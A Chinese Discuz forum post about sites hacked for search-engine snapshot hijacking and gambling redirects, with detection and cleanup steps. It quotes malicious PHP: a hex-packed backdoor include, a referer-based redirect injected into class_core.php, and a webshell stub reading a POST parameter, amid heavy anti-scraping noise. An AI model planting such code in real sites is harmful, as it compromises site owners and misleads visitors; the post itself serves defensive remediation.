热搜: GBK| UTF8SC| UTF8TC| BIG5|
分类
快捷导航
admin 发表于 2022-9-6 11:52:47 | 显示全部楼层 |阅读模式 打印 上一主题 下一主题
 

  p. f3 Q+ |! u+ y00X0 网站被挂马 搜索引擎快照被劫持 网页被跳转
2 I" Y8 u7 P6 E" e8 ^6 b6 |0 Q9 b" P# N7 z+ b" L2 F) wwww.tmd0.com
如果你的网站被劫持到一些非法站点上导致网站被标记为非法、赌博时,可能直接会被各种浏览器和搜索引擎标记为“恶意网站”从而直接拦截。世间最痛苦的事莫过于此,特么的被人阴了...
  t. E! g# c! Q  O( P, n/ C+ T7 u5 qwww.tmd0.com
苦心经营网站多年,树立口碑不容易。一日被黑,日日被劫持。从此以后用户通过搜索引擎打开你的网站不是色情就是赌博。正常业务啥都没了,也别再谈什么可信度和口碑了。网站被收录与网站无关且违禁的博彩关键词,如果处理不及时,措施不当等待你的将是搜索引擎的惩罚:网站排名与权重下降,轻则不收录重则被k。
* y6 I. O' B2 d
# r+ E2 H- T4 u8 n, j% K5 S$ i00X1 站长们苦恼的问题https://www.tmd9.com
% H" Z! @3 m: P6 u8 Z0 W
* Q& E$ e7 x9 [$ u网站被挂马该怎么解决?网站挂马的解决方法、网站被挂马怎么排查?网站老是被黑被挂马是什么原因?如何检测网站被挂马?网站快照被劫持怎么办?搜索引擎劫持怎么解决?百度快照被篡改劫持怎么回事?360快照被劫持怎么解决?discuz(DZ)被挂马快照被劫持的解决办法?dz论坛被挂马、快照劫持怎么防范?网页被跳转到博彩页面怎么办?诸如此类的问题不在罗列实在是太多了,下面就解决你的疑问!6 {8 L+ D3 K, L) x: \( Mwww.tmd0.com

7 T+ |* Y. J2 _6 Z00X2 挂马原理分析
! N/ ~, l8 l! D' H7 m" y7 B- K6 A2 L3 C$ l3 cwww.tmd0.com
快照劫持、搜索跳转其实是黑帽SEO利用站中站脚本自动繁殖文章“能熟练应用快照劫持(流量、爬虫、权重) 搜索跳转到自动繁殖文章(站中站脚本)做自己关键词获取定向流量的方法”
3 B) h( l% Y1 v7 M5 L8 ^
0 Y7 c7 H# D8 `: Z3 f搜索引擎快照劫持是通过代码来判断和识别蜘蛛访问的,若正常访问,则给出正常内容,若判断到是搜素引擎来访问,就给出另一个页面,使搜素引擎抓取快照进行改变,之后判断来路跳转。
, A$ |: C) {* |  O9 d) c; X8 o! |7 x- [1 Iwww.tmd0.com
[快照劫持挂马方法] 多为下面两种方式实现其劫持功能
5 B2 ~/ Z% |5 m2 x3 Y- K1 Z* o( }% L: y& U! X  C+ o. ~www.tmd0.com
第一种:放在上html声明内引导劫持快照; L1 D, c9 T1 O2 Twww.tmd0.com

6 x1 v# T4 Y8 r, g2 Y9 b3 B: ~+ n0 Q, _这种劫持要比放在源码中更加高明难以发现,查看源码是看不到任何痕迹的。% i1 Z% w6 K: P+ N& b( Iwww.tmd0.com
  m1 M7 c( d- Cwww.tmd0.com
+ B0 c, B0 Q+ O6 W, t1 _www.tmd0.com
- k" p+ h2 y% Q& D. M" uwww.tmd0.com
第二种:利用字典文件繁殖文章使用include引用并提交给搜索引擎实施劫持
* g8 n2 C5 t! y( D- S# X" B+ z0 _2 V% L7 x5 i. ]" Q+ N9 Dwww.tmd0.com
字典文件是一些关键词文件为文章生成提供资源,生成劫持静态文件放到要引用的文件中,根据SEO知识可知一般目录都不会太深,比较深的一般会有sitemap文件放在根目录引导蜘蛛爬取,平时注意下你的目录下sitemap.txt是否被篡改。
( X- m; N7 x! ?& Y" s1 e5 n% `4 ^! ^+ E* l# g& ?! h, kwww.tmd0.com
第一种是最简单粗暴的加到页面header文件里面引导蜘蛛。第二种相对更加隐蔽些,只需在Include中加上劫持目录即可。
# c! p) {2 k# V# a3 i! I
- Q: K; ^9 o) ^( t/ k: |Include引用代码:) E4 P. y1 o6 L  W% f$ Jwww.tmd0.com

* h( d4 L7 y3 W" E- m. C0 Z@include($_SERVER[‘DOCUMENT_ROOT’].PACK(\'H*\',\'2F646174612F737973646174612F30\'));( e( w$ b! h6 Zwww.tmd0.com

, g% _- a1 c% ?( w9 m
" C7 A  @2 f! P2 i& m) c+ `- [4 A; I, Mwww.tmd0.com
【处理方法】解密代码:2F646174612F737973646174612F30 解蜜后为:/data/sysdata/0查看此目录找到并清理木马文件。' n/ v5 Y1 p# t+ H/ H. j& u0 E$ `www.tmd0.com
5 g8 z+ _+ P. P9 G5 v5 n" N( bwww.tmd0.com

6 J6 o) W8 i* X6 ~3 |2 ?" c+ B* v% p' w# m. h8 h4 H. twww.tmd0.com
00X3 DZ论坛挂马常被反复篡改的文件
9 e% v- c, _% h+ Z- }" A7 x- V' w/ c+ F0 B; q; kwww.tmd0.com
function_core.php、discuz_application.php、class_core.php、config_global.php注意排查。
4 _" e- B. M8 ~
4 O. P1 K; m: h一定有很多站长会遇到这个问题,不论怎么修改FTP密码,换服务器...class_core.php文件还是反复被挂马,class_core.php文件反复被挂马什么原因?一会是class_core.php被修改,一会是config_global.php被修改。那是因为木马后门已经扎根在你cms程序内部了,会时刻被唤醒使用。
% I9 L5 N  |1 T
& V0 F5 t# W1 Iclass_core.php常被插入劫持<head>以上部分代码,就是第一种html声明劫持。查看源码看不到任何信息,只能抓取诊断。: Y, |. X& k- M+ v& n1 s* awww.tmd0.com

4 b8 E7 ~8 N! N" Y为防恶意使用,仅贴出部分代码。
+ ^- H6 _' M8 p9 z0 ?* V
$ F# g9 B  |4 j% Derror_reporting(0);/ `- A9 @4 z9 i+ Q  u7 Vwww.tmd0.com

. e3 I3 b( o, }; Z2 ^: T+ G$S9 = explode(\"|\",_decode(\'NTguMjQ3fDE4MC4xNTZ8MTgwLjE1NnwxMTcuMTc3fDU5LjE3MnwxNzEuODN8MTE0LjgyfDYxLjE3Mg==\'));9 F: {3 T7 C7 o% ~. B, T" w1 cwww.tmd0.com

: O& H0 u  c, h$ g+ Q6 z9 [) c9 a" kwww.tmd0.com

( r) B' d" W+ [: v2 U# K00X4 网站快照被劫持解决方法+ @& J1 W( }  [! Lwww.tmd0.com

: O0 B& F' o9 K/ U: Q- e1、进discuz后台找到工具-文件校验,找到最近被修改的php文件与源文件对比下。! m, V7 j: {7 Hwww.tmd0.com

* p) Z7 S+ r# P7 ~, V8 M2、dz的文件校验不会检查utility文件夹,除了upload里的文件,其他辅助功能文件一般用不到,如上传了请删除,避免被黑客利用。
( K+ G0 }+ O% n8 r6 g/ Y& b- w0 a7 S) A: l3 J; Ewww.tmd0.com
3、使用后台文件校验看修改文件,UCcenter校验UC文件修改。) O! H) T1 _  j- H% twww.tmd0.com
& ?  O% o$ k1 |- owww.tmd0.com
4、网站目录使用时间排序方式,查看最近修改的文件有没有可疑。
' @7 `( b7 p* E  @* A8 ^
. A  N9 u/ O# @3 z: e5、404态设置到位,可很大程度避免收录不存在的博彩劫持页面。
- Z# f# E) X8 @1 m, [# D4 J( y3 X. d! i: x8 x: K7 R$ B+ Kwww.tmd0.com
6、看网站目录内有没有被上传的tools目录或tools类型文件。6 P9 o/ E! t, b: bwww.tmd0.com

' {: v9 @( b/ _3 V7、要有一查到底的决心,不然很难找到黑客埋藏的根基。. z* k7 w8 h4 rwww.tmd0.com
2 W9 p4 d  @1 h8 {6 zwww.tmd0.com
8、多方位加强防护,让劫持死于摇篮...+ ?" V" ], N; x1 {- _1 k' O/ iwww.tmd0.com
& U; |& ?. E6 H8 t' Xwww.tmd0.com
00X5 网站被劫持了怎么查看目录变化
3 H. t0 r1 I* {  i
3 J/ }( T. k; j8 n" Z: U( N+ n站长们要学会从侧面发现快照劫持,不要仅仅在百度一个搜索引擎内site,要在多个搜索引擎内site,这样可以利用搜索引擎侧面检测反应网站快照劫持问题,只要有一个有劫持问题,就说明你网站一定被挂马了。并不是所有的搜索引擎都在同一时间内被劫持快照的,因为搜索引擎与搜索引擎算法技术的成熟程度是不一样的,还有就是你网站本身与搜索引擎爬虫友好度有关。
, W" X( |% V2 Q  i) F, x
2 K9 b1 H0 F) Z. r综上述解决快照劫持的大概步骤:校验文件-修改替换原始文件-设定404-举报/更新快照...
# a) D/ x' ?5 L" @1 ~: A& x" E; S& a4 l% w$ r, Swww.tmd0.com
加强防范建议:插件不要随便使用,后门很多。( N0 N  U9 D  r8 d( v* @www.tmd0.com
2 O! r+ K! R  u0 e0 ]9 kwww.tmd0.com
00X6 让你们见识下快照劫持字典文件、站中站脚本目录长什么样& I( J* M' k9 g/ _7 xwww.tmd0.com

" W; k- ]( P) i6 A& K0 ~* F快照劫持页面内容多为博彩、赌具、特服小姐等黄赌毒违法信息或其他办证,公关小姐类灰色外推行业关键词。/ [# ^6 {" B5 ^1 Cwww.tmd0.com

+ b" r. o! v, C& i  n) R8 |
- e) B: n' S: S# k) J5 a* `$ B# k0 c7 X2 k" X8 i: Fwww.tmd0.com

' L$ S1 }9 |% T2 n9 F6 `2 D
: c+ H, `, o0 M& M6 G$ N) ~4 b, }) m6 h8 p/ v0 Nwww.tmd0.com

- F5 ?! m7 S/ V1 D5 N
9 {6 U6 r. Z& B# p+ S4 x$ A7 \2 e8 Q9 m5 j; |www.tmd0.com

& o1 u; E  N) g1 V* X3 e6 [, h+ y* k: q  b4 `$ \4 E. ^8 W, Qwww.tmd0.com
00X7 搜索引擎快照劫持扩展阅读# X1 N, t5 |3 h/ f& p. ewww.tmd0.com
  p6 ^7 U( p: _$ l8 q3 L/ `www.tmd0.com
1、什么是搜索引擎快照劫持?
- X( a8 k1 |" c0 n" }, Y+ R9 X+ k- I) \7 Q# U4 Wwww.tmd0.com
快照劫持:利用网站程序漏洞或爆破ftp,挂马篡改网页信息并主动post提交给搜索引擎,让其抓取收录,快照的内容多为博彩等推广内容。$ Q$ z! r/ c5 l; A- w8 o+ k" ewww.tmd0.com

6 R* K; S& E% _1 g- B) w5 L2、搜索引擎快照劫持技术是什么?
* ]. ^0 y1 j' j) A+ e- E7 ?( q
) e! z) }2 g" S6 C2 ?7 Z搜索引擎劫持主要分快照劫持与跳转劫持,就是传说中的黑帽SEO手法快照劫持与流量劫持。其中快照劫持有的直接篡改原始网页挂马劫持,有的再生成新链接或上传大量静态页面挂黄赌毒博彩相关行业推广词;跳转劫持是使用跳转脚本让访问链接跳转到其他指定博彩站页面,主要是提高网站受众群体量与增加网站曝光度。5 L. J2 g. \: J" I5 f/ r4 B1 dwww.tmd0.com
# M8 `" l+ u& D, Cwww.tmd0.com
3、最新快照劫持及网页篡改网站入侵挂马问题
- }  k. @( ?& t$ [* @; {- L& ]4 A3 E! _% G1 W0 j2 Lwww.tmd0.com
class_core.php文件插入跳转代码
3 W/ @" n$ a0 @; z/ R$ P3 o
& j8 U/ V# B  Zerror_reporting(E_ALL);* @9 I  ~6 D  j+ Y" J  J1 p! nwww.tmd0.com
6 q# w" p+ l5 U" M$ P+ Y; Bwww.tmd0.com
@error_reporting(1);
: e2 b$ ~/ g. {3 r' C( x, \, L
% r# ]6 o! L9 P& }; [@$ref = strtolower($_SERVER[\'HTTP_REFERER\']);% n$ x* R4 o$ I! B; j0 _4 C) P4 Owww.tmd0.com
* E- e" @: s$ d2 C  iwww.tmd0.com
@$jump_ref = explode(\"|\",\"haoso.|so.|haosou.|google.|soso.\");, V7 V: S' v6 t( Q: rwww.tmd0.com

6 |5 b4 V3 m9 X* Sforeach($jump_ref as $r){* f3 D! Y0 ~) h+ d0 |% N4 g3 Owww.tmd0.com

- ^4 W  \+ p2 I9 R$r = trim($r);% J' c$ n3 B' q1 W) ]( s% H" bwww.tmd0.com

3 e' ^& n$ C& \& Vif(stristr($ref,$r)){
3 }& U& X' Y3 G' O' i. I( I& V+ l( j4 D; lwww.tmd0.com
if($_GET[\'tid\']>50000){
8 \4 I" S* C- e) y4 O, A- Q; F
4 k/ l% ~" y& b% y- r5 I/ D- f, v. [header(\'Location: http://www.xxxxxxxxx.com/?op5u\');& Z; g% }* L, p, e+ i% h- Kwww.tmd0.com

( h: p/ T; N6 Y) _4 C5 `die();
( q9 ]' R! d) z  R9 n
6 `+ j5 X- C" x: Q: s, A; ^/ [}1 ], E) }& g8 |- b$ M+ {www.tmd0.com

) {; Q/ }' L+ a( F7 r}
& p9 O& u% Y& f" g
. g4 O* |$ H* q% Q}, C; R+ n+ l1 A3 R7 Q, X# W" _www.tmd0.com
# g; D* @( g' X! B& Hwww.tmd0.com
% |* o# {3 f* R9 Bwww.tmd0.com
, _0 j2 z7 [; W1 l0 I$ M) x5 uwww.tmd0.com
<?php
. _; ]- W- R5 _  P7 ]
. g- i  w( J( {( x& F* werror_reporting(0);set_time_limit(0);
1 y' \) X0 |4 {4 I" l* N& C9 T6 pwww.tmd0.com
[email protected]$_POST[\"gutou\"];* q% J- D# c' i6 H! Uwww.tmd0.com

4 z. p' I9 I. Vif($GuTou){& U9 r1 A/ P" @www.tmd0.com

1 G6 |2 E' O- X( \; a$cc=\"\";for($i=0;$i<strlen($GuTou);$i+=2)& u9 ]$ N& S' t7 nwww.tmd0.com
. u& [6 m( X  \% Iwww.tmd0.com
$cc.=urldecode(\"%\".substr($GuTou,$i,2));( V4 f4 p) m! F, p; v1 _$ F) dwww.tmd0.com

- r8 O& M, e& r}1 n- Q8 {8 e0 m, Dwww.tmd0.com
' _  _' v2 R6 r8 y$ \+ q$ ewww.tmd0.com
?>
4 ?* O8 \% o6 g2 d( k9 Y' t0 W
9 f$ m- N5 _5 [- \8 A如何发现被快照劫持了- T( p, b3 }2 O5 D  Y: M3 C  K7 xwww.tmd0.com
& r) R  N4 c+ X) t3 X+ a% H- s; Bwww.tmd0.com
使用语法 关键词 site:语法 【】【官网入口】...
% ^/ F: o& I0 x' m# p) }4 Z& c2 i* v& N3 E2 v& a, M3 g! z( iwww.tmd0.com
$ ^/ Q0 n. @1 D7 K: }! ~1 `. owww.tmd0.com

/ ]( ^3 s9 t2 @& ]7 N6 a8 tdiscuz被挂马discuz百度快照被劫持的解决方法
( f) Z' f5 `8 j0 |/ |
9 S; V) ~4 w: t[DZ挂马]discuz!论坛360快照劫持的处理方法0 j. M9 ?9 n2 p$ J! B" R; e: V* _# Xwww.tmd0.com
* P# m- m1 \* @9 u# c! Ewww.tmd0.com
dz论坛被挂马、快照劫持怎么防范?
, I" D$ c- T- o. l; u) |- S
! Y" i* r! x6 W. H: ?9 A关于dz论坛恶意挂赌博广告的排查心得$ k% J0 W3 x$ D8 X7 z6 rwww.tmd0.com
0 G, H( S' v; f3 uwww.tmd0.com
discuz被挂马_百度快照被劫持的解决办法
$ i. Q$ t  _- r, M* \
8 d0 B* c5 ?. L5 \" v$ i; v网站被挂马_各大搜索引擎快照被劫持的处理方法4 d& F. ~& Y0 Y9 g6 P* rwww.tmd0.com
回复

使用道具 举报

精彩评论@?!

正序浏览
Gornlep 发表于 2022-11-6 17:56:31 | 显示全部楼层
 
e6_style
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

会员达人更多
精彩分享

热门推荐

更多

最新信息

更多
[帮助 Help]Discuz! 求调用各个版块推荐主题的代码09-06
[帮助 Help]Discuz! 颜文字表情gbk版的用户可能会有乱09-06
[帮助 Help]Discuz! ucenter后台登录时的验证码如何改09-06
[帮助 Help]Discuz! X帖子内容页增加阅读全文功能09-06
[帮助 Help]Discuz! 亮剑云 商城APP插件配置教程和功能09-06
[帮助 Help]Discuz! 插件的通过数据库读取和缓存读取获09-06
[帮助 Help]Discuz! 插件接口概述09-06
[帮助 Help]Discuz! (新人求助)discuz 怎么查看所有09-06
[帮助 Help]Discuz! 模板机制09-06
[帮助 Help]Discuz! 导航如何输出?输出是可以自定义HT09-06
[帮助 Help]Discuz! 3.12. 版块群组置顶09-06
[帮助 Help]Discuz! 的插件机制 页面嵌入09-06
[帮助 Help]Discuz! 亮剑云 通过插件标识符即可轻松定09-06
[帮助 Help]Discuz! 调用主导航和二级导航09-06
[帮助 Help]Discuz! 亮剑云 请问“确认收货时长”在哪09-06
[帮助 Help]Discuz! 9.6. 签到领奖09-06
[帮助 Help]Discuz! 亮剑云 商家收入插件配置教程和功09-06
[帮助 Help]Discuz! Linux云计算架构-使用LNMP架构部署09-06
[帮助 Help]Discuz! 开发Discuz论坛插件教程09-06
[帮助 Help]Discuz! 2.5. 模板管理09-06
[帮助 Help]Discuz! 怎么判断帖子标题与内容开头的文字09-06
[帮助 Help]Discuz! 模板风格创建09-06
[帮助 Help]Discuz! 缓存调用09-06
[帮助 Help]Discuz! ucenter_members数据补齐common_me09-06
[帮助 Help]Discuz! 帖子ID和回帖ID恢复初始状态变成109-06
[帮助 Help]Discuz! 相册标题的字数长度被限制,在哪个09-06
[帮助 Help]Discuz! 《视频课堂点播直播》微信小程序打09-06
[帮助 Help]Discuz! 请问老大,关于默认缩略图问题09-06
[帮助 Help]Discuz! 简洁的Discuz! X2.5 论坛修改注册09-06
[帮助 Help]Discuz! 文章、帖子搜索结果缩略图显示09-06
Powered by Discuz! L1.0 Beta TMD0 Inc. 本站资源仅供学习等 ^_^ 请下载后24小时内删除 ^_^ 谢谢合作 ^_^   
中国互联网违法和不良信息举报中心
南昌网络警察报警平台
经营性网站备案信息
南昌市公安局网监备案
赣公网安备案